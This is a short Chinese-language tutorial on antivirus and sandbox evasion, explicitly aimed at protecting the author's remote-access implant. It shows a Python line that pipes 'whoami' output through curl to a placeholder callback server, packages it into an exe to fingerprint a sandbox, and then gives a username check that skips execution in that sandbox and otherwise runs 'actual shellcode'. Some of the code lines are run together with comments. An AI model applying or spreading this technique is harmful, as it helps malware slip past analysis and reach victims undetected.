免杀｜一文教你如何写自己的反沙箱工具

1.漏洞背景

简单地说，反沙箱技术指的是一种可以检测出虚拟环境的运行软件的技术。虚拟环境是指一种用于模拟真实操作系统的软件环境，软件通常会利用虚拟环境来隐藏自己的真实意图。而反沙箱技术通过识别虚拟环境的特征，从而发现并拦截软件的活动，保护我们的远控。

2.漏洞实例

首先启动我们的反连平台

用法在历史文章里，链接如下。

我们用它的作用，是为了接受沙箱运行的反连，用来判断沙箱环境。

2. 制作一个python的exe

关键代码如下：

import os
result = os.system('whoami | curl -X POST -d @- http://ip:8881/')

使用pyinstaller打包为exe,并丢到反沙箱上。

pyinstaller -F ceshi.py

3. 查看反连

发现了一个特征，沙箱的whoami返回值为：

desktop-h9urb7tadministrator

4. 开始编写反沙箱代码。

import subprocess
def get_current_user():    """ 获取当前用户名 """    return subprocess.check_output("whoami").decode().strip()
# 获取当前用户current_user = get_current_user()
# 检查当前用户是否为 'desktop-h9urb7tadministrator'if current_user.lower() == r'desktop-h9urb7tadministrator'.lower():    print("当前用户为 desktop-h9urb7tadministrator，脚本不执行。")else:    print("当前用户不是 desktop-h9urb7tadministrator，可以执行脚本。")    # 在这里添加你想要执行的代码    实际的shellcode